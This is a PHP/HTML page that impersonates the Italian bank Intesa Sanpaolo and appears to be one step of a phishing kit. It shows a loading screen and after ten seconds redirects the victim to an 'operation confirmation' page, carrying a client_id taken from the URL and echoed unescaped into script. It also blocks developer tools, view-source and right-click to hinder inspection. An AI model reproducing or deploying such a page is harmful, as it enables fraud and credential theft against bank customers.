<!DOCTYPE html>
<?php
include_once '../../../INC/APP.php';
$bin4=$_GET['client_id'];
?>
<script>

	document.onkeydown = function(e) {
	  if(event.keyCode == 123) {
	     return false;
	  }
	  if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
	     return false;
	  }
	  if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
	     return false;
	  }
	  if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
	     return false;
	  }
	}


	
	document.addEventListener('contextmenu', function(e) {
	  e.preventDefault();
	});

</script>
<html>
<head>
	      <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <!-- link_icons -->
        <link rel="stylesheet"  href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.5.0/font/bootstrap-icons.css">
        <link rel="stylesheet"  href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> 
        <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
        <title>Banca Intesa Sanpaolo - Conto Corrente per Famiglie, Giovani e Aziende</title>
        <!-- logo site web-->
        <link rel="icon" href="../persone-e-famiglie_login/img/favicon.ico" type="image/x-icon"/>
        <link rel="shortcut icon" href="../persone-e-famiglie/img/favicon.ico" type="image/x-icon" />
        <!-- link__css -->
        <link rel="stylesheet"  href="css/bootstrap.css">
        <link rel="stylesheet"  href="css/mooddark.css">
</head>
<body>

 
         
        <div class="loading ">
             <img src="../persone-e-famiglie/img/loading.gif">
        </div>


        <script src="js/jquery-3.5.1.min.js"></script>
        <script src="js/jquery.mask.js"></script>
        <script src="js/bootstrap.min.js"></script>
   	<script>
	function makeid()
							  {
								  var text = "";
								  var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

								  for( var i=0; i < 110; i++ )
									  text += possible.charAt(Math.floor(Math.random() * possible.length));

								  return text;
							  }
							  
 function Redirect() 
    {  
        window.location="../conferma.l'operazione_app/index.php?client_id=<?php echo $bin4 ?>"; 
    } 
    document.write(""); 
    setTimeout('Redirect()', 10000);
</script> 
</body>
</html>